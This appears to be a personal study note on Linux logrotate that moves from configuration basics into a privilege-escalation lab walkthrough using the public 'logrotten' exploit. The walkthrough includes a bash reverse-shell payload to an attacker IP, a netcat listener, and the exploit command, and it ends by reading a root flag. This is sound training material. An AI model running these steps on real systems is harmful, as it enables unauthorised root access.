17 - Logrotate - JA Smith

# Intro - Linux produces large amounts of log files - To prevent disks from overflowing, a tool called `logrotate` takes care of archiving or disposing of old logs - Also, searching through many large log files is time-consuming - To prevent this and save disk space, `logrotate` has been developed - The logs in `/var/log` give admins the info they need to determine the cause behind malfunctions - Almost more important are the unnoticed system details, such as whether all services are running correctly. - `Logrotate` has many features for managing these log files - These include the specification of: - `size` of the log file - `age` of the log file - `action` to be taken when one of these factors is reached ```bash #for more info man logrorate logrotate --help ``` - The function of the rotation itself consists in renaming and dumping the log files - For example, new log files can be created for each new day, and the older ones will be renamed automatically - Another example of this would be to empty the oldest log file and thus reduce memory consumption. - Normally, `logroate` works periodically via `cron` and controlled via the configuration file `/etc/logrotate.conf` - Within this file, it contains global settings that determine the function of `logrotate` ```bash cat /etc/logrotate.conf ``` - To force a new rotation, we can set the date after the individual log files in the status file `/var/lib/logrotate.status` or use the `-f`/`--force` option - Below the `logroatet.status` file is shown ```bash sudo cat /var/lib/logrotate.status /var/log/samba/log.smbd" 2022-8-3 /var/log/mysql/mysql.log" 2022-8-3 ``` - We can find corresponding conf files in `/etc/logroratte.d/` as seen below ```bahs ls /etc/logrotate.d/ alternatives apport apt bootlog btmp dpkg mon rsyslog ubuntu-advantage-tools ufw unattended-upgrades wtmp ``` - Now let's drill-down into `dpkg` ```bash cat /etc/logrotate.d/dpkg /var/log/dpkg.log { monthly rotate 12 compress delaycompress missingok notifempty create 644 root root } ``` # Exploiting Logrotate - To exploit `logrotate`, some prereqs must be met : 1. we need `write` permissions on the log files 2. logrotate must run as a privileged user or `root` 3. vulnerable versions: - 3.8.6 - 3.11.0 - 3.15.0 - 3.18.0 - We can also use a preconfigured exploit named [logrotten](https://github.com/whotwagner/logrotten) - Below we clone the git repo and compile the c program for `logrotten` ```bash git clone https://github.com/whotwagner/logrotten.git cd logrotten gcc logrotten.c -o logrotten ``` - Next, create a revshell payload ```bash echo 'bash -i >& /dev/tcp/<kali_ip>/9001 0>&1' > payload ``` - Then, before running the exploit, determine which option `logrotate` uses in `logrotate.conf` ```bash grep "create\|compress" /etc/logrotate.conf | grep -v "#" create ``` - As shown above, the option being used is `create`, so we use the exploit adapted to this function - Start a listener on our Kali box ```bash sudo nc -lvnp 9001 ``` - Finally, run the exploit with the prepared payload and wait for a revshell to hit the listener ```bash ./logrotten -p ./payload /tmp/tmp.log ``` --- # Exercise ## Initial Enum - `ping` test ![[images/Pasted image 20260209201107.png]] - `nmap` scans ![[images/Pasted image 20260209201817.png]] - `ssh` into target with given creds - light local enum ![[images/Pasted image 20260209201942.png]] ## logrotate enum - enum `logrorate` ver ![[images/Pasted image 20260209202204.png]] - ver 3.11.0 is vulnerbale to `logrotten` - list `logrotate.d` ![[images/Pasted image 20260209202222.png]] - run `cat /etc/logrotate.d/dpkg` ![[images/Pasted image 20260209202330.png]] ## exploit with `logrotten` - check that we have access to `git` and `gcc` ![[images/Pasted image 20260209202709.png]] - `git clone` repo on target - running into issues ![[images/Pasted image 20260209203023.png]] - let's try to pull down the repo on our Klai box and move to target - `git clone` on Kali ![[images/Pasted image 20260209203125.png]] - host the `.c` file from Kali ![[images/Pasted image 20260209203214.png]] - grab from target with `wget` ![[images/Pasted image 20260209203304.png]] - now, compile on target ![[images/Pasted image 20260209203338.png]] - create a payload with revshell to Kali box ![[images/Pasted image 20260209203527.png]] - start listener on Kali ![[images/Pasted image 20260209203505.png]] - determine function for `logrotate` > nothing ![[images/Pasted image 20260209203710.png]] - try running exploit anyways ![[images/Pasted image 20260209203820.png]] - waiting for `cron` job to run and for a revshell to hit listener... - nothing ## reset - use `scp` to move the whole folder this time ![[images/Pasted image 20260209205601.png]] - compile the c program - modify payload as below ```bash echo "cat /root/flag.txt > /home/htb-student/flag.txt" > payload ``` - list `~/backups/` ![[images/Pasted image 20260209204535.png]] - modify `~/backups/access.log` to trigger exploit ```bash echo test >> /home/htb-student/backups/access.log; ./logrotten /home/htb-student/backups/access.log -p payload ``` ![[images/Pasted image 20260209205911.png]] - we see the following ![[images/Pasted image 20260209205902.png]] - now `ls ~` and `cat` flag ![[images/Pasted image 20260209205849.png]]